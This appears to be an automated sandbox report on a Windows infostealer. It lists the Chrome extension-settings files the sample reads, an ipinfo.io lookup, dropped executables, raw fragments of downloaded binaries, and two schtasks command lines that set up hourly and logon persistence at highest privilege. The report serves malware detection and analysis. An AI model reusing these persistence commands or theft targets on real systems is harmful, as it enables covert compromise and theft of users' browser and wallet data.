VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 73587416 registers.edi: 1974991376 registers.eax: 73587416 registers.ebp: 73587496 registers.edx: 1 registers.ebx: 8706476 registers.esi: 2147746133 registers.ecx: 4261783159	1	0	0

Application Crash

Process iexplore.exe with pid 2836 crashed

Time & API

Arguments

Status

Return

Repeated

__exception__

Jan. 19, 2024, 7:57 a.m.

stacktrace:

RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b
CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x75b94387
NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x754bef51
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c
NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x754b6b42
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c
NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x754d5c3a
NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x755506b8
WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x75c6d7e6
WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x75c6d876
WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x75c6ddd0
CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x75b88a43
CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x75b88938
DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x75b8950a
WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x75c6dccd
WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x75c6db41
WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x75c6e1fd
DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x75b89367
DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x75b89326
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4
DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x755f788a
CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x75b4a48b
CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x75b4853b
CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x75b4a4ac
CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x75b5cd48
CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x75b5d87a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7559b727
registers.esp: 106426500
registers.edi: 77971076
registers.eax: 106426500
registers.ebp: 106426580
registers.edx: 312
registers.ebx: 106426864
registers.esi: 2147746133
registers.ecx: 78256792

__exception__

Jan. 19, 2024, 7:57 a.m.

stacktrace:

RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x75c6f725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x754d414b
ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x75b3fe14
StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x75c6a338
IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x7532e99f
IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x753072ed
RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x752fab0d
GetIUriPriv2+0x603 CoInternetIsFeatureEnabledForIUri-0xdf6 urlmon+0x1ea98 @ 0x752fea98
RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x752f87f7
CopyStgMedium+0x286 FindMediaType-0x70d urlmon+0x1ba32 @ 0x752fba32
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4
DispatchMessageA+0xf GetMessageA-0x9 user32+0x17bca @ 0x755f7bca
CreateAsyncBindCtx+0xb2f URLDownloadToCacheFileW-0x54c urlmon+0x4516f @ 0x7532516f
CreateAsyncBindCtx+0xa8e URLDownloadToCacheFileW-0x5ed urlmon+0x450ce @ 0x753250ce
RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x752fa0d8
RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x752f9b85
RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x752f9aa8
CreateAsyncBindCtx+0xccc URLDownloadToCacheFileW-0x3af urlmon+0x4530c @ 0x7532530c
URLDownloadToCacheFileW+0xe5 CoInternetIsFeatureZoneElevationEnabled-0x2c18 urlmon+0x457a0 @ 0x753257a0
DllCanUnloadNow+0xcfc8 IEAssociateThreadWithTab-0x294dd ieframe+0x2540c @ 0x727e540c
DllCanUnloadNow+0xce86 IEAssociateThreadWithTab-0x2961f ieframe+0x252ca @ 0x727e52ca
CreateExtensionGuidEnumerator+0x5d622 SetQueryNetSessionCount-0x15f9a ieframe+0x100ea3 @ 0x728c0ea3
RtlGetUserInfoHeap+0x225 RtlQueueWorkItem-0x210 ntdll+0x67e96 @ 0x77907e96
TpCallbackIndependent+0x527 RtlIsCriticalSectionLockedByThread-0x240 ntdll+0x454f4 @ 0x778e54f4
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7559b727
registers.esp: 73587416
registers.edi: 1974991376
registers.eax: 73587416
registers.ebp: 73587496
registers.edx: 1
registers.ebx: 8706476
registers.esi: 2147746133
registers.ecx: 4261783159

Steals private information from local Internet browsers (50 out of 4035 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\Local Extension Settings\cjmkndjhnagcfbpiemnkdpomccnjblmj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Local Extension Settings\lpilbniiabackdjcionkobglmddfbcjo\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\MEIPreload\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SafetyTips\Sync Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FontLookupTableCache\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\GrShaderCache\Sync Extension Settings\aijcbedoijmgnlmjeegjaglmepbmpkpi\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FontLookupTableCache\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Sync Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\RecoveryImproved\Local Extension Settings\bgpipimickeadkjlklgciifhnalhdjhe\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\GrShaderCache\Sync Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Local Extension Settings\epapihdplajcdnnkdeiahlgigofloibg\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Sync Extension Settings\mgffkfbidihjpoaomajlbgchddlicgpn\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Sync Extension Settings\lpilbniiabackdjcionkobglmddfbcjo\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Sync Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Sync Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ZxcvbnData\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\RecoveryImproved\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\Sync Extension Settings\jnkelfanjkeadonecabehalmbgpfodjm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Local Extension Settings\gjagmgiddbbciopjhllkdnddhcglnemk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Sync Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\MEIPreload\Sync Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\recovery\Sync Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Sync Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Sync Extension Settings\fhilaheimglignddkjgofkcbgekhenbh\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobl\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crowd Deny\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ZxcvbnData\Sync Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Sync Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments\Local Extension Settings\aijcbedoijmgnlmjeegjaglmepbmpkpi\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\GrShaderCache\Local Extension Settings\gjagmgiddbbciopjhllkdnddhcglnemk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Sync Extension Settings\jnkelfanjkeadonecabehalmbgpfodjm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Sync Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Subresource Filter\Sync Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm\CURRENT

Looks up the external IP address (1 event)

domain

ipinfo.io

Creates executable files on the filesystem (4 events)

file	C:\Users\test22\AppData\Local\Temp\jobA4iX2On64Ax7t5e\5230B0bsHB6m0ZI1S5Bl.exe
file	C:\Users\test22\AppData\Local\Temp\jobA4iX2On64Ax7t5e\27dnxXnblzFDiZPFTSr6.exe
file	C:\Users\test22\AppData\Local\Temp\jobA4iX2On64Ax7t5e\TTPWYoz21cqHkGJWQZz9.exe
file	C:\Users\test22\AppData\Local\Temp\jobA4iX2On64Ax7t5e\Ovmqrne2EgFGXsI2OqUM.exe

Creates a suspicious process (2 events)

cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST

Drops a binary and executes it (4 events)

file	C:\Users\test22\AppData\Local\Temp\jobA4iX2On64Ax7t5e\27dnxXnblzFDiZPFTSr6.exe
file	C:\Users\test22\AppData\Local\Temp\jobA4iX2On64Ax7t5e\Ovmqrne2EgFGXsI2OqUM.exe
file	C:\Users\test22\AppData\Local\Temp\jobA4iX2On64Ax7t5e\5230B0bsHB6m0ZI1S5Bl.exe
file	C:\Users\test22\AppData\Local\Temp\jobA4iX2On64Ax7t5e\TTPWYoz21cqHkGJWQZz9.exe

Drops an executable to the user AppData folder (4 events)

file	C:\Users\test22\AppData\Local\Temp\jobA4iX2On64Ax7t5e\Ovmqrne2EgFGXsI2OqUM.exe
file	C:\Users\test22\AppData\Local\Temp\jobA4iX2On64Ax7t5e\5230B0bsHB6m0ZI1S5Bl.exe
file	C:\Users\test22\AppData\Local\Temp\jobA4iX2On64Ax7t5e\27dnxXnblzFDiZPFTSr6.exe
file	C:\Users\test22\AppData\Local\Temp\jobA4iX2On64Ax7t5e\TTPWYoz21cqHkGJWQZz9.exe

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW Jan. 19, 2024, 7:56 a.m.	thread_identifier: 2516 thread_handle: 0x00000138 process_identifier: 2512 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000130	1	1	0
CreateProcessInternalW Jan. 19, 2024, 7:56 a.m.	thread_identifier: 2624 thread_handle: 0x00000140 process_identifier: 2620 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x0000013c	1	1	0

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (2 events)

Time & API	Arguments	Status	Return	Repeated
Process32NextW Jan. 19, 2024, 7:56 a.m.	snapshot_handle: 0x00000474 process_name: svchost.exe process_identifier: 2312	1	1	0
Process32NextW Jan. 19, 2024, 7:56 a.m.	snapshot_handle: 0x00000474 process_name: mscorsvw.exe process_identifier: 2340	1	1	0

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Jan. 19, 2024, 7:56 a.m.	process_identifier: 2912 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 16 (PAGE_EXECUTE) base_address: 0x05a60000 process_handle: 0xffffffff	1	0	0

An executable file was downloaded by the process regasm.exe (4 events)

Time & API	Arguments	Status	Return
InternetReadFile Jan. 19, 2024, 7:56 a.m.	buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $Ç®Þ¦íýÞ¦íýÞ¦íýj:ýý¦íýj:ýC¦íýj:ýý¦íý@*ýß¦íýÎèüó¦íýÎéüÌ¦íýÎîüË¦íý×Þný×¦íý×Þ~ýû¦íýÞ¦ìý÷¤íý{Ïãü¦íý{Ïîüß¦íý{Ïýß¦íýÞ¦zýß¦íý{Ïïüß¦íýRichÞ¦íýPELªeà"¬ LwÀ @`$@@@d\|@ @à uð4@À .text« ¬ `.rdataûÀ ü° @@.datalpÀH¬@À.rsrc@@ ô@@.relocuà v @B¹t Mè8ýhé#DèðYÃhó#DèðYÃèæÞhø#DèrðYÃèY<hý#DèaðYÃQè©h$DèOðYÃ¡0MQ@0MPèã#h$Dè/ðYÃèÞ%h$DèðYÃè®çh!$Dè ðYÃèA2h&$DèüïYÃèPÁh0$DèëïYÃ¹%Mèh?$DèÕïYÃVñNè´Nè¬j(VèâìYYÆ^ÂUìì8Ç0MtÉI3ÒÇM0ÉI M¤MVQf¨Mèo¡0M@Ç0M\ÉI¡0MHûÿÿ,M3À¹¸M£ÌM£ÐM£ÔMèY ¹èMèí¹øMèã¹MèÙ3À¹M£TM£XM£\M£`M£dM£hM£lM£pM£tM£xMè3ÀÇ¬M<ÉI¹M£M£Mf£M£ M£¤Mf£¨M£°M£´M£¸M£¼M£ÀM£ÄMÇÈM@ÉI£ÌM£ÐM£ÔMÇØM@ÉI£ÜM£àM£äMÇèM@ÉI£ìM£ðM£ôMÇøMDÉI£üM£M£M£M£MÇMèÏ¹(MèÇM<ÉI3Ò¹MMMMè¹@Mè3À¹MP£`M£dM£hM£pM£tM£xMèGMÈè$P¡0MHÁ4MèMèè¼MÈè{¼3ÀfÇ0Mjö£,M£ M£$M£M£M£(M£Mf£lM¢M¢}M£\MÿhÂIðö3Ò\|MèÂRÿhÈI¸0M^ÉÂ¡0M¹@MV@Ç0MhÉI3À£4M£8M£<Mè+¹tMè!¾¨MÎèh ÉIÎèoW¸0M^ÂVñNèeNè request_handle: 0x00cc000c	1	1
InternetReadFile Jan. 19, 2024, 7:56 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $wDþØ3%3%3%hM=%hM%hM %æH!%æH'%æHF%hM"%3%ã%¨K2%¨Ko2%¨K2%Rich3%PELlÖeà °¼ú? @@@ P1<ðØ011<@à j@@àP@ ª@à´@àP <´@à.rsrcðð@àÐ)üò@à.data@Ð0@î@àAxYëÄÁõÐáÌµ9Éôá=G;£çoãú9ø'¶Yû§³pR÷Öäô: yPV¹Âõ _¯óa"ä7Þ!S$mYùU@2°Ë;ÙãôÊ®Ä¼a×ùö§0@æ0ëp\|ößS]³ÃVpnqw#'U[xvÅo¬ãÆÑ5ï+lé ø¬µù'\avjYí84R@ðÌç-¬õ\ã§µ"ì§\g¤ÍâÄpÇ·¨`Øá×ß8-u«ÔÙ\|úÂy!ÍD{ðTPz÷a6çÕùÁ(â¾\|ÏnÚZÔßÑh¤©ã£¢HâÄõóÂì÷ißw\ÈõÛÄ&4vBáa´aô¼ShòµèÑ£z=MöÃf#ÄOfU@Ü¶ß5aÝ¸øa¦jã «IÂf8¨Ì t24?uÐy^¦ú÷ø4`}ÜsÅ~äü+våÎè"Ø_«÷ 3%°YýÃÙ¹°»ÖgL ÉçG?w.jxØ°pßµÙ3;©[¿Ó qlK;PUÅ² ©÷\|3ÄiÑf¥Ú·óÃñªØP½CÎÀ7º¡ ¡Uóñc±uõaWwGû)÷ \¢Âsc©Þ¦.ê³Ø²UåTÙÓl£×©Ú?Ð´=Û[Ðk/èQòël Gh¤>IþYÂ(Çñ+P-úÎw»,@%¤[TåY*YRö`ð({ §IÌaPý]>H·ÜT-¸@òrRHçÆ×¥¥Ã}ÖÛ%'ý&¶.,ÐõÔã¯³Aõ¤)Ôa6Â;`'TSÂã×LQðr ;ù xÛxµ¥qÄ&P4¼¶_ì=ö"ýYírÚà=y1A§gÑ÷ÃX Ôù d[lËCo°[XßëUÀ¥Ê+è« Ë$NMáAîÔÛ" t¾÷ÄéþT_·µü8¯ä g-õØ½He·\õ[ æò$ïër8°,Ö,TKù0ªoÛUg¢u»BpÉBvØDÔx5æ\|ÁâûPB·«ù´Ó¥4VT½q;;×ÕÌyº ËbäC§»ßÏK¼ê´%IP#8ÊÉàá\|6÷N×åßÝQ!\|ÎáçH0¸Ú¯NóFÕóz§88÷¡"´®º@Ç®ïÿoEZ9»¿RkjÂEdkî request_handle: 0x00cc000c	1	1
InternetReadFile Jan. 19, 2024, 7:57 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL¡$eà.0ð @ ``Ð K @ H.text$î ð `.rsrc ò@@.reloc@ø@BH¤Z<ç`$0]+(ªæl_~:K( è s ( þþ ( ( ?rps z6+(òN1b(N+( ¨R(( j+(å/_(( }0@s @ (&0c ?( ~ ( :E í&e ´ªZa~J{ka(3( %(& Ð( (&(&0( ~ 8c o d º Obîa~J{a(3( 90 o (:(&( o (&Xi?ÿÿÿ(&0( ~ 8d o ¶àñÛ _F¸ÆY ë.@a~J{la(3( 9+ o (:(& o (&Xi?ÿÿÿ(&0 e ?( ~ ( :G.( þ%(&%~ ( & Ð( (&(&0_~ o :~ o! o" 8o# ; o" Ý 9o$ ÜÝ&Ý 9F XX0ü(((( Ó¢'7 ó18ba~J{¢a(3( Áà½ ¼!a þ²®öa~J{{a(3 iëf E/ça~J{£a(3 `ê c u³KÁa~J{a(3( ½Wc c Y'a~J{ka(3 ;»: ÅÒ%ma~J{Va(3 EE ¼ktX õbsLa~J{a(3( »6Åf Râqqa~J{`a(3 Fj8 c Ìa~J{a(3 ä] Ó¦Ð^a~J{Ha(3( V$èUf ½N´a~J{ba(3 ªýüb 07a~J{ a(3 ùþû 5ÿ¥dX ñÂoja~J{®a(3( %ßY b bSá¶a~J{Xa(3 +ª ½â¯a FÙ7a~J{«a(3 t4õ )-X yH5\a~J{la(3( ÅàF Ma~J{a(3 ß]4Ù x¤Ø,a request_handle: 0x00cc000c	1	1
InternetReadFile Jan. 19, 2024, 7:57 a.m.	buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $CÔëîº¸îº¸îº¸L¹¹ îº¸L¿¹Æîº¸L½¹îº¸HG¸îº¸H¾¹îº¸H¹¹îº¸H¿¹Rîº¸L¾¹îº¸L¼¹îº¸L»¹îº¸î»¸ïº¸Ì³¹îº¸ÌE¸îº¸î-¸îº¸Ì¸¹îº¸Richîº¸PEL7geà"ÈTDDQà@`Q@ BpP$¸BÐ°@àÀà@´@à@ ô@àÀàü@à° rü@à.rsrcÀPºn @àÐ)ü( @à.dataàAz$ @àtÙ©ëñµ÷Æ]"abE}¬Gý1Wc/¦eÿýcnyPUÉØ¿63ImÈÿ½ðv=\|£«·P3ùvëëxã)% ³6¦~>ãA6")prNAèk»ñßY4ÕfÀKì£w#{ùC+gyW;Åær¾rñ\|·)GT÷îeæNÉ~¿Oò@`qÅ³Ä] [&&V``~µñ<,f¤[ñ¾ =`Ýx«Üðz¯¶´4(°suý¯G×DtwÛsIKÝ6©Td¬ã¾$FYdoÆ_¢6î nøÌ@ÁuÊ Ù»((Ëg¸KÁ±ýA!G~ê½9bÍ÷ä©#ÿù;ÄUì ° V)C®õ]+\| w»îVÖnÌxi ×;M_-åv«y$¨½ÿí@n½E©ðèX«"]8/¼x\@?£òw óðpê(å»:ù¨¹¦< f?Ä¥!QfLúï;¿»)p}ú`OFg ßùòÄÉlk}ëGØ? ãæÓüpÐ`}ÂÀoBpð¦lH ÛVÅIïHZ2ªgUÇäIÌBÚ`¿ %^uµ¡¢?ß¬®%Ã'ÍÕÞ9¯T¢&Wåè©ÃÝÃ=Ôë(Xbë¨wQ¥u"</ tG1 ¦WuRetÔ ézU+BnÁë_y¯¶Îx-ã¥zÿ ²®¯>/rã¢O4u,·Î;ûÛ&oF3Çß4/ÁO°RlÇ ²u¿ÝL Û2àïÃâ~ ¼D¹¹LòÑÕ+¹¿qêYd99)>ÓÍ´}Ü\|dÕç»ZíØ¸VÞóoÌ¶ÐÖ°VÐq·îéò¤Ì÷¢9çñã'qÔÐ¿^ú-öÑU³@([Â¯ôì"åÝ»]w»¶ç_NÒàiÏ^¦\ZÑ®Ù§qÿ}ÈÛzm¥.éãÂO"ºGTEzïÞÉ)³À`*»}_îÃ·û/PõöË®;<æáj&xãeåø.\|DV¯,ó¬( ð¬À;rÒí2òÁ³ÊØ@Cmu¬<í&°fpë¶<¦nÓ®¦8Öß¿IbÑÀæ'ýðvê&äoõç®d¦Z¯UL$®¹vPmÄÚÓµ<ßñð=Ëuóú²J¸É>ôËé¨$4 ßïØÏ ²'¸5OàîÊÎr ¹Íö, request_handle: 0x00cc000c	1	1

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x00174c00', u'virtual_address': u'0x00002000', u'entropy': 7.99842274601879, u'name': u'.text', u'virtual_size': u'0x00174b54'}

entropy

7.99842274602

description

A section with a high entropy has been found

entropy

0.998660415271

description

